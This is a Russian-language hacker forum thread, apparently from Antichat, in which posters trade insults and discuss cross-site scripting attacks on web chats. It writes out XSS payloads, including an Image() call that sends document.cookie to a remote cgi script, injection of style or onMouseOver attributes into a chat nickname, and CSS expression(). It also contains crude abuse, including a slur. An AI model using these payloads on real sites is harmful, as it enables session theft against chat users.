хехе, посмеялся) А если по делу, ты лучше слушай что тебе советуют. дело в том что твои глуповатые соображения давно грамотно описаны в мануалах по клиентским скриптам и всем известны
БУГА-ГА-ГА-ГА!!!! БУ-ГА-ГА!! И ЭТО МНЕ ГОВОРИТ ЧЕЛОВЕК, КОТОРЫЙ НЕ УМЕЕТ ОТКЛЮЧАТЬ КАРТИНКИ В МОЗИЛЛЕ!!!! Т
Не знаю о чём ты. Он тут самый лучший хакер на античате. Если бы ты понимал с кем ты говоришь ты бы слушал его советы и так бы не говорил.
ХО-ХО-ХО))))))))))) Я НЕ УСТАЮ С СЕБЯ ПОРАЖАТЬСЯ)))) ТОЛЬКО ТАКОЙ ОТЪЯВЛЕННЫЙ ЧЁРТ, КАК Я, МОЖЕТ ЗАЛУПИТЬ НА САМОГО ГЛАВНОГО БУКВАЛЬНО С ПЕРВОГО ЧАСА ЗНАКОМСТВА, ТАК ЧТО Я ТУТ САМЫЙ КРУТОЙ))) НУ А РАЗ УЖ НАШ МЕГА-ХАКЕР ЗАПАМЯТОВАЛ ОБ КАРТИНКАХ МОЗИЛЛЫ, ТО ВСЁ-РАВНО. 1) НЕ-А. ОТКЛЮЧЕНИЕ КАРТИНОК - НЕ ПОМОГАЕТ, ПРОБОВАЛИ УЖЕ. ПРАВДА, САМ СКРИПТ ОТОБРАЖАЕТСЯ В ЧАТ-ЛИСТЕ ДЕЙСТВИТЕЛЬНО КАК НЕРАСКРЫТАЯ КАРТИНКА. 2) ВСЁ-ТАКИ ЕСТЬ РЕДКИЕ СКРИПТЫ, НА КОТОРЫХ ЭТО КАНАЕТ, НО, ВИДИМО, У НАС ТАКИМИ - НЕ ГАСЯТ. ГАСЯТ - ДРУГИМИ.
Agressor ну хуле, теперь все понятно ты не отъявленый черт а отчаяный пидар и дурачок)) White Jordan насчет самого лучшего хакера - разумеется не я, это даже как-то не очень смешно
Я не говорил это для смеха. Я читал очень многие вещи на античате. На форуме тоже много читал сравнив всех, Я просто пришол к выводу из фактов что ты и есть самый лучший хакер на античате. Это совсем не для смеха было сказанно. Просто когда человек достигает высоких уровней независимо от специальности которой он занимается, он не замечает свой уровень. Это уже даказынный факт. Ты просто не замечаешь себя и в себе что и даказывает правильность моей теории что ты самый лучший хакер на античате. Плюс достаточно прочитать твои стать, посты т.д. и сравнив их со статьями других людей, (Если человек не ослеп) сразу будет видно что это так.
Ладно, давай разберемся ... Отключение картинок означает что браузер не будет обрабатывать атрибут src тега IMG вот и все. Например HTML: <img src=javascript:alert('ok')> Такой способ загрузки скрипта, естественно не сработает, как и этот: HTML: <script>img=new Image();img.src="javascript:alert();"</script> Но скрипт можно запустить не только с помощью картинок, так ведь ? Что мешает использовать IFRAME или Onload ? Я говрю про пример скальпеля ... Я не знаю, что ты зациклился на этом img ...
Если речь идет о примере HTML: <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> То в таком случае как раз браузер ЗНАЕТ что загружает картинку, поскольку загрузка производится через объект Image(). Т.е. отключение отображения картинок приводит к тому, что этот скрипт не работает.
В случае скальпеля это было возможно(правда все использовали именно Image()). Но в других случаях тэги не пропускаются обычно, мы используем атрибуты. И значение атрибута как раз -- скрипт. <font color="#000000" ВПИСЫВАЕМ_СВОИ_ЗНАЧЕНИЯ>НИК_В_ЧАТЕ</font> ВПИСЫВАЕМ_СВОИ_ЗНАЧЕНИЯ - это style или например onMouseOver. Лучше естественно style. А раз стиль, то единственный фактически стандартный способ запустить скрипт background. это только кажется что способов куча, а на практике восновном связано с графикой. Приблизительно так. http://antichat.ru/crackchat/index.html
На самом деле есть хороший способ не связанный с графикой: функция expression.) Например: Code: <font style=top:expression(alert())>XSS</font>